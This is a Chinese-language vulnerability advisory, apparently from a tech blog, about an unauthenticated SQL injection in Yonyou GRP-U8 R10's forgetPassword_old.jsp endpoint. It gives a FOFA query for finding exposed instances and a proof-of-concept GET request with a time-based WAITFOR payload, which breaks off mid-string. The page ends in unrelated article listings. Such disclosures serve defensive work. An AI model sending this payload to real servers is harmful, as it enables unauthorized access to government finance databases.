用友GRP-U8 forgetPassword_old.jsp SQL注入漏洞(QVD-2023-31085)

0x01 产品简介

用友GRP-U8R10行政事业内控管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。

0x02 漏洞概述

用友GRP-U8R10行政事业内控管理软件 forgetPassword_old.jsp接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。

0x03 影响范围

用友GRP-U8R10产品官方在售及提供服务的版本为U8Manager,产品分B、C、G三个产品系列,以上受到本次该漏洞的影响。

0x04 复现环境

FOFA:app="用友-GRP-U8"

0x05 漏洞复现

PoC

GET /u8qx/forgetPassword_old.jsp?action=save&idCard=1&userName=1&inputDW=1&inputYWRQ=1%27;WAITFOR%2

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-01-30 06:30:03       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-01-30 06:30:03       106 阅读
  3. 在Django里面运行非项目文件

    2024-01-30 06:30:03       87 阅读
  4. Python语言-面向对象

    2024-01-30 06:30:03       96 阅读

热门阅读

  1. Python学习之路-Django基础:类视图与中间件

    2024-01-30 06:30:03       51 阅读
  2. Excel-Apache POI

    2024-01-30 06:30:03       40 阅读
  3. Spring设计模式之简单工厂模式

    2024-01-30 06:30:03       58 阅读
  4. 学习鸿蒙基础(1)

    2024-01-30 06:30:03       53 阅读
  5. pytest封装请求类

    2024-01-30 06:30:03       47 阅读
  6. SpringMVC

    SpringMVC

    2024-01-30 06:30:03      60 阅读